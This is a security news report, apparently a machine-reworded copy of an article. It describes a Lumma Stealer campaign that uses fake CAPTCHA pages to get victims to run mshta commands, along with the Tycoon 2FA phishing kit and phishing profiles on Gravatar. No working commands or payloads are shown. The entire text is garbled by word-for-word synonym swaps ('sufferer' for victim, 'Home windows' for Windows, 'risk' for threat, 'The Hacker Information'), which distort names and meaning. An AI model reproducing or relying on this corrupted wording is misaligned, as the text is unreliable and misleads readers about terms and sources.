Cybersecurity researchers are calling consideration to a brand new malware marketing campaign that leverages pretend CAPTCHA verification checks to ship the notorious Lumma info stealer.
“The marketing campaign is international, with Netskope Risk Labs monitoring victims focused in Argentina, Colombia, the USA, the Philippines, and different nations around the globe,” Leandro Fróes, senior risk analysis engineer at Netskope Risk Labs, mentioned in a report shared with The Hacker Information.
“The marketing campaign additionally spans a number of industries, together with healthcare, banking, and advertising, with the telecom business having the very best variety of organizations focused.”
The assault chain begins when a sufferer visits a compromised web site, which directs them to a bogus CAPTCHA web page that particularly instructs the location customer to repeat and paste a command into the Run immediate in Home windows that makes use of the native mshta.exe binary to obtain and execute an HTA file from a distant server.
It is price noting {that a} earlier iteration of this method, broadly referred to as ClickFix, concerned the execution of a Base64-encoded PowerShell script to set off the Lumma Stealer an infection.
The HTA file, in flip, executes a PowerShell command to launch a next-stage payload, a PowerShell script that unpacks a second PowerShell script accountable for decoding and loading the Lumma payload, however not earlier than taking steps to bypass the Home windows Antimalware Scan Interface (AMSI) in an effort to evade detection.
“By downloading and executing malware in such methods, the attacker avoids browser-based defenses because the sufferer will carry out the entire crucial steps exterior of the browser context,” Fróes defined.
“The Lumma Stealer operates utilizing the malware-as-a-service (MaaS) mannequin and has been extraordinarily energetic prior to now months. By utilizing totally different supply strategies and payloads it makes detection and blocking of such threats extra advanced, particularly when abusing person interactions inside the system.”
As just lately as this month, Lumma has additionally been distributed by way of roughly 1,000 counterfeit domains impersonating Reddit and WeTransfer that redirect customers to obtain password-protected archives.
These archive recordsdata include an AutoIT dropper dubbed SelfAU3 Dropper that subsequently executes the stealer, in accordance to Sekoia researcher crep1x. In early 2023, risk actors leveraged an identical approach to spin up over 1,300 domains masquerading as AnyDesk as a way to push the Vidar Stealer malware.
The event comes as Barracuda Networks detailed an up to date model of the Phishing-as-a-Service (PhaaS) toolkit referred to as Tycoon 2FA that features superior options to “impede, derail, and in any other case thwart makes an attempt by safety instruments to verify its malicious intent and examine its internet pages.”
These embrace the usage of professional — probably compromised — e-mail accounts to ship phishing emails and taking a collection of steps to forestall evaluation by detecting automated safety scripts, listening for keystrokes that counsel internet inspection, and disabling the right-click context menu.
Social engineering-oriented credential harvesting assaults have additionally been noticed leveraging avatar supplier Gravatar to imitate numerous professional companies like AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.
“By exploiting Gravatar’s ‘Profiles as a Service,’ attackers create convincing pretend profiles that mimic professional companies, tricking customers into divulging their credentials,” SlashNext Area CTO Stephen Kowski mentioned.
“As an alternative of generic phishing makes an attempt, attackers tailor their pretend profiles to resemble the professional companies they’re mimicking intently by companies that aren’t typically identified or protected.”